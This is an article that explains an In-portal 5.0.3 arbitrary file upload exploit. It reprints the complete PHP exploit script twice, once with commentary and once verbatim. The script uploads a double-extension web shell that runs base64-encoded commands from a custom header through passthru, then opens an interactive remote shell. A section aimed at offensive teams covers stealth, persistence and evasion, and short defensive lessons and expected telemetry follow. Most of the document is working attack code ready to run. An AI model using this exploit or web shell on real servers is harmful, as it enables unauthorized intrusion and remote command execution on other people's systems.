In-portal 5.0.3 Arbitrary File Upload Exploit Explained

In-portal 5.0.3 Arbitrary File Upload Exploit Explained
What this paper is
This paper details an exploit for In-portal version 5.0.3 that allows an attacker to upload arbitrary files, including PHP files containing malicious code, to the web server. This file upload vulnerability can lead to remote code execution on the target system. The exploit leverages a misconfiguration in the file upload functionality of the built-in editor's file manager.
Simple technical breakdown
The core of the vulnerability lies in how In-portal's file manager handles file uploads. Specifically, the connectors/php/config.php file, when configured with $Config['Enabled'] = true;, allows uploads of files with extensions that are not properly validated. The exploit crafts a malicious PHP payload and attempts to upload it with a seemingly legitimate extension (like .jpg or .zip) but with a .php extension preceding it (e.g., 0k.php.jpg).
The server, due to a lack of strict validation, accepts this file. Once uploaded, the attacker can then access this file via a web request and execute arbitrary commands by passing them in a custom HTTP header (Cmd). The PHP code within the uploaded file decodes this command and executes it using passthru(), returning the output back to the attacker.
Complete code and payload walkthrough
The provided PHP script is a self-contained exploit that automates the process of finding and exploiting the vulnerability.
<?php
/*
-----------------------------------------------------------------
In-portal 5.0.3 Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
... (ASCII art and header information) ...
Developers: http://www.in-portal.org/
Download : http://www.in-portal.com/download.html
exploited by ..: eidelweiss
Special thanks to all my friends who helped and support me when i sick
details..: works with an Apache server with the mod_mime module installed (if specific)
[-] vulnerable code in path/core/editor/editor/filemanager/connectors/php/config.php
[*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = BASE_PATH . WRITEBALE_BASE . '/user_files/';
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
[*] // Attention: The above 'UserFilesPath' must point to the same directory.
[*]
[*]
[*] $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array('swf','flv') ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
[*] $Config['DeniedExtensions']['Media'] = array() ;
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
*/- Header and Comments: The initial part of the script contains comments explaining the vulnerability, its origin, and the target application. It also includes ASCII art and contact information for the author. Crucially, it points to the vulnerable file:
path/core/editor/editor/filemanager/connectors/php/config.phpand highlights the configuration directives that enable the file manager and define allowed/denied extensions.
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);error_reporting(0);: This suppresses all PHP error messages, making the script's output cleaner and preventing sensitive information from being leaked.set_time_limit(0);: This removes the time limit for script execution, allowing the exploit to run indefinitely if needed, especially during the interactive shell phase.ini_set("default_socket_timeout", 5);: Sets a 5-second timeout for socket operations, preventing the script from hanging indefinitely if a connection fails.
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}http_send($host, $packet)function: This function is responsible for sending raw HTTP requests to the target host.$sock = fsockopen($host, 80);: Attempts to establish a TCP connection to the specified$hoston port 80 (HTTP).while (!$sock) { ... }: If the initial connection fails, it prints a message and retries until a connection is established. This is a basic retry mechanism.fputs($sock, $packet);: Sends the raw HTTP$packetto the server.while (!feof($sock)) $resp .= fread($sock, 1024);: Reads the server's response in chunks of 1024 bytes until the end of the file (connection) is reached. The response is accumulated in the$respvariable.fclose($sock);: Closes the socket connection.return $resp;: Returns the complete server response.
function upload()
{
global $host, $path;
$connector = "/core/editor/editor/filemanager/connectors/php/config.php";
$file_ext = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--abcdef\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--abcdef--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}upload()function: This function attempts to upload the malicious PHP file.global $host, $path;: Accesses the global variables$hostand$pathwhich are set from command-line arguments.$connector = "/core/editor/editor/filemanager/connectors/php/config.php";: Defines the path to the vulnerable configuration file.$file_ext = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");: An array of common file extensions. The exploit will try to append.php.before these extensions.foreach ($file_ext as $ext): The loop iterates through each extension in$file_ext.print "\n[-] Trying to upload with .{$ext} extension...";: Informs the user which extension is being attempted.- Payload Construction (
$data): This is the crucial part where the malicious content is prepared for upload.$data = "--abcdef\r\n";: Starts the multipart/form-data boundary.$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";: This line sets thefilenameparameter in theContent-Dispositionheader. The name0k.php.{$ext}is key. It tricks the server into thinking it's a file with the extension$extbut embeds.phpbefore it.NewFileis likely the expected form field name for file uploads.$data .= "Content-Type: application/octet-stream\r\n\r\n";: Sets the content type.$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";: This is the actual PHP code that will be executed.<?php ... ?>: Standard PHP tags.\${print(_code_)}: This part is used as a marker to easily parse the output later. The\before$is likely an artifact of string concatenation or escaping, but the intent is to print the literal string_code_.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}: This is the core command execution.\$_SERVER[HTTP_CMD]: Accesses the value of a custom HTTP header namedCmd.base64_decode(...): Decodes the command received in theCmdheader, as commands are sent base64 encoded.passthru(...): Executes the decoded command directly and outputs its raw output.
.\${print(_code_)}: Another marker for parsing.
$data .= "--abcdef--\r\n";: Ends the multipart/form-data boundary.
- HTTP POST Request Construction (
$packet):$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";: Constructs the POST request.Command=FileUploadandCurrentFolder={$path}are parameters likely expected by the file manager script.$packet .= "Host: {$host}\r\n";: Sets the Host header.$packet .= "Content-Length: ".strlen($data)."\r\n";: Sets the length of the data being sent.$packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";: Specifies the content type and boundary for the form data.$packet .= "Connection: close\r\n\r\n";: Standard HTTP headers.$packet .= $data;: Appends the constructed form data to the packet.
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);: Sends the POST request usinghttp_sendand then usespreg_matchto parse the response. It looks for a pattern likeOnUploadCompleted(status, message), extracting the status code and message.if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");: Checks if the upload was successful. Status codes 0 and 201 are considered successful. If not, it exits with an error.- Verification Request:
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";: Constructs a GET request to retrieve the uploaded file.$packet .= "Host: {$host}\r\n";: Sets the Host header.$packet .= "Connection: close\r\n\r\n";: Standard HTTP headers.$html = http_send($host, $packet);: Sends the GET request.
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;: This is the check to see if the uploaded file is executable and contains the expected markers.eregi("print", $html)checks if the output contains the word "print".eregi("_code_", $html)checks for the_code_marker. If "print" is NOT in the output but_code_IS, it implies the PHP code was executed and the markers are present, meaning the upload was successful and the file is likely executable. It returns the extension used.sleep(1);: Pauses for 1 second before trying the next extension to avoid overwhelming the server or triggering rate limiting.
return false;: If the loop finishes without a successful upload, it returnsfalse.
// Main execution block
print "\n+--------------------------------------------------------------------+";
print "\n| In-portal 5.0.3 Remote Arbitrary File Upload Exploit by eidelweiss |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /In-portal/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\portal-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>- Initialization and Argument Handling:
- Prints a banner.
if ($argc < 3): Checks if the correct number of command-line arguments (host and path) are provided. If not, it prints usage instructions and exits.$host = $argv[1];: Assigns the first argument (hostname or IP) to$host.$path = $argv[2];: Assigns the second argument (web path to In-portal) to$path.
- Exploit Execution and Shell Interaction:
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");: Calls theupload()function. If it returnsfalse(meaning upload failed), the script exits.else print "\n[-] Shell uploaded...starting it!\n";: If upload was successful, it indicates that the shell is ready.define(STDIN, fopen("php://stdin", "r"));: Opens standard input for reading, allowing the user to type commands.while(1): Enters an infinite loop to provide an interactive shell.print "\portal-shell# ";: Displays a prompt.$cmd = trim(fgets(STDIN));: Reads a line of input from the user, trims whitespace, and stores it in$cmd.if ($cmd != "exit"): If the command is not "exit":- Command Execution Request:
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";: Constructs a GET request to the uploaded PHP file.$packet.= "Host: {$host}\r\n";: Sets the Host header.$packet.= "Cmd: ".base64_encode($cmd)."\r\n";: This is the critical part for command execution. The user's command ($cmd) is base64 encoded and sent in the customCmdHTTP header.$packet.= "Connection: close\r\n\r\n";: Standard HTTP headers.
$html = http_send($host, $packet);: Sends the request to execute the command.if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");: Checks if the response contains the_code_marker. If not, it indicates an error.$shell = explode("_code_", $html);: Splits the response string using_code_as a delimiter. The output of the executed command will be between the two_code_markers.print "\n{$shell[1]}";: Prints the command output (the second element after splitting).
- Command Execution Request:
else break;: If the command is "exit", the loop breaks, and the script terminates.
Mapping list:
error_reporting(0);: Hides errors.set_time_limit(0);: Prevents script timeout.ini_set("default_socket_timeout", 5);: Sets socket timeout.http_send()function: Sends raw HTTP requests and receives responses.upload()function: Orchestrates the file upload process.$connector: Path to the vulnerable file manager config.$file_ext: List of extensions to try for obfuscation.$dataconstruction:--abcdef\r\n: Multipart boundary start.Content-Disposition: form-data; name="NewFile"; filename="0k.php.{$ext}": Sets the filename to0k.php.<tried_extension>.Content-Type: application/octet-stream\r\n\r\n: Sets content type.<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>: The PHP payload that decodes and executes commands from theCmdheader.--abcdef--\r\n: Multipart boundary end.
$packetconstruction (POST): Builds the HTTP POST request for file upload.preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", ...): Parses the upload response for status.if (!in_array(intval($html[1]), array(0, 201))): Checks upload success status.$packetconstruction (GET): Builds the HTTP GET request to test the uploaded file.if (!eregi("print", $html) and eregi("_code_", $html)): Verifies the uploaded PHP file is executable and contains markers.$host = $argv[1];: Gets target host from command line.$path = $argv[2];: Gets target path from command line.define(STDIN, fopen("php://stdin", "r"));: Prepares for interactive input.while(1)loop: Interactive shell loop.$cmd = trim(fgets(STDIN));: Reads user command.$packetconstruction (GET for shell): Builds HTTP GET request for command execution.Host: {$host}\r\n: Sets Host header.Cmd: ".base64_encode($cmd)."\r\n": Sends base64 encoded command inCmdheader.$shell = explode("_code_", $html);: Parses the response to extract command output.print "\n{$shell[1]}";: Prints the command output.
Practical details for offensive operations teams
- Required Access Level: Unauthenticated access to the target web application. The vulnerability is in a publicly accessible component.
- Lab Preconditions:
- A target In-portal 5.0.3 installation.
- The
filemanagercomponent within the editor must be enabled ($Config['Enabled'] = true;inconfig.php). This is often the default configuration. - The web server must be configured to allow execution of PHP files.
- The web server must be accessible over HTTP (port 80).
- The target server should not have overly aggressive Web Application Firewalls (WAFs) or intrusion detection systems that might flag the
multipart/form-datarequest or the specific PHP payload.
- Tooling Assumptions:
- A system with PHP installed to run the exploit script.
- Basic network connectivity to the target.
- Execution Pitfalls:
- Incorrect Path: The
$pathargument must be accurate. If In-portal is installed in a sub-directory (e.g.,http://target.com/inportal/), the path should be/inportal/. A trailing slash is usually required. - File Manager Disabled: If
$Config['Enabled']isfalseinconfig.php, the exploit will fail. - Strict File Extension Validation: While the exploit targets a weakness, some server configurations or custom security measures might still prevent the upload. The list of
$file_extcan be expanded or modified if needed. - WAF/IDS Blocking: The
multipart/form-datarequest, the payload content, or the subsequent command execution requests might be blocked. - Server Response Parsing: The
preg_matchanderegifunctions rely on specific response patterns. If the target server modifies these responses, the exploit might fail. mod_mimedependency (mentioned in paper): The paper mentions "works with an Apache server with the mod_mime module installed (if specific)". This might imply that the server's MIME type handling plays a role in how the uploaded file is interpreted or served. However, the exploit primarily relies on the PHP interpreter executing the file.- File Naming Collisions: If a file named
0k.php.<ext>already exists in the upload directory, the behavior is unknown and could lead to failure or overwriting.
- Incorrect Path: The
- Tradecraft Considerations:
- Stealth: The exploit uses standard HTTP POST and GET requests. The primary indicators would be the unusual
filenamein the POST request and the customCmdheader in subsequent GET requests. - Persistence: Once the shell is uploaded, it provides a command execution channel. For persistence, the attacker would need to upload additional tools or establish a more robust backdoor.
- Evasion: Encoding commands with Base64 is a basic obfuscation. More advanced evasion might involve encrypting the payload or using different command execution techniques.
- Reconnaissance: Before running the exploit, confirm the In-portal version and check if the file manager is likely enabled.
- Stealth: The exploit uses standard HTTP POST and GET requests. The primary indicators would be the unusual
- Expected Telemetry:
- Web Server Logs:
- POST requests to
/core/editor/editor/filemanager/connectors/php/config.phpwithCommand=FileUploadandContent-Type: multipart/form-data. - GET requests to the uploaded file (
/path/to/user_files/0k.php.<ext>) with a customCmdheader. - Successful execution of PHP code within the uploaded file.
- POST requests to
- Network Traffic:
- HTTP POST requests containing the
multipart/form-datapayload. - HTTP GET requests with the
Cmdheader. - Potentially, outbound connections if the executed commands attempt to connect to external resources.
- HTTP POST requests containing the
- File System:
- Creation of a new file named
0k.php.<ext>in the web server's user file upload directory (e.g.,BASE_PATH . WRITEBALE_BASE . '/user_files/').
- Creation of a new file named
- Web Server Logs:
Where this was used and when
- Application: In-portal version 5.0.3.
- Vulnerability Type: Arbitrary File Upload leading to Remote Code Execution.
- Publication Date: April 23, 2010.
- Usage Context: This exploit was likely used against web servers running In-portal 5.0.3. Given its publication date, its active exploitation period would have been around 2010 and shortly thereafter, until the vulnerability was patched or systems were updated. It's a classic example of a web application vulnerability that allows attackers to gain a foothold on a server.
Defensive lessons for modern teams
- Input Validation is Paramount: Always validate file uploads rigorously. This includes:
- Extension Whitelisting: Only allow explicitly permitted file extensions.
- MIME Type Checking: Verify the MIME type of the uploaded file against its actual content.
- Filename Sanitization: Remove or disallow potentially dangerous characters or sequences in filenames.
- Double Extension Attacks: Be aware of and prevent attacks that use multiple extensions (e.g.,
shell.php.jpg).
- Secure Configuration Defaults: Applications should ship with secure default configurations. Sensitive features like file managers should be disabled by default or require explicit, secure configuration.
- Least Privilege: Ensure that uploaded files are stored in directories that do not have execute permissions for the web server process. If possible, store uploads outside the web root entirely.
- Regular Patching and Updates: Keep all web applications and their components updated to the latest secure versions. This exploit targets a known vulnerability in an older version.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including malformed
multipart/form-datarequests, suspicious filenames, and known malicious payloads. - Logging and Monitoring: Implement comprehensive logging for web server access and application events. Monitor logs for suspicious activity, such as unusual file uploads, requests with custom headers, or attempts to execute commands.
- Code Review: Regularly review application code for security flaws, especially in areas handling user input, file uploads, and external data processing.
ASCII visual (if applicable)
+---------------------+ +--------------------------+ +--------------------+
| Attacker's Machine | ----> | Target Web Server (HTTP) | ----> | In-portal App |
| (Runs Exploit PHP) | | (Port 80) | | (PHP Interpreter) |
+---------------------+ +--------------------------+ +--------------------+
| |
| 1. POST Request | 3. File Uploaded
| (multipart/form-data) | (e.g., /user_files/0k.php.jpg)
| `filename="0k.php.jpg"` |
| `payload="<?php ... passthru(...) ... ?>"` |
| |
+---------------------------------------------------------------+
|
| 4. GET Request
| (to uploaded file)
| `Cmd: base64_encoded_command`
|
+--------------------+
| In-portal App |
| (PHP Interpreter) |
+--------------------+
|
| 5. Command Executed
| (passthru)
| 6. Output Returned
| (via HTTP response)
|
+--------------------+
| Target Web Server |
| (OS/Shell) |
+--------------------+Explanation:
- The attacker's machine sends a crafted HTTP POST request to the In-portal application. This request includes the malicious PHP payload disguised with a double extension (
0k.php.jpg) within themultipart/form-data. - The In-portal application, specifically the file manager component, receives the request. If misconfigured, it allows the upload of this file.
- The file is saved on the web server's filesystem, typically within a user-accessible directory.
- The attacker then sends a series of HTTP GET requests to the uploaded file. Each request includes a command to be executed, encoded in the
Cmdheader. - The PHP code within the uploaded file decodes the command from the
Cmdheader. passthru()executes the decoded command on the target server's operating system.- The output of the executed command is captured by the PHP script and sent back to the attacker in the HTTP response.
Source references
- Exploit-DB Paper: https://www.exploit-db.com/papers/12350
- Exploit-DB Raw: https://www.exploit-db.com/raw/12350
- In-portal Developers: http://www.in-portal.org/
- In-portal Download: http://www.in-portal.com/download.html
Original Exploit-DB Content (Verbatim)
<?php
/*
-----------------------------------------------------------------
In-portal 5.0.3 Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Developers: http://www.in-portal.org/
Download : http://www.in-portal.com/download.html
exploited by ..: eidelweiss
Special thanks to all my friends who helped and support me when i sick
details..: works with an Apache server with the mod_mime module installed (if specific)
[-] vulnerable code in path/core/editor/editor/filemanager/connectors/php/config.php
[*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = BASE_PATH . WRITEBALE_BASE . '/user_files/';
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
[*] // Attention: The above 'UserFilesPath' must point to the same directory.
[*]
[*]
[*] $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array('swf','flv') ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
[*] $Config['DeniedExtensions']['Media'] = array() ;
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;
$connector = "/core/editor/editor/filemanager/connectors/php/config.php";
$file_ext = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--abcdef\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--abcdef--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
print "\n+--------------------------------------------------------------------+";
print "\n| In-portal 5.0.3 Remote Arbitrary File Upload Exploit by eidelweiss |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /In-portal/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\portal-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>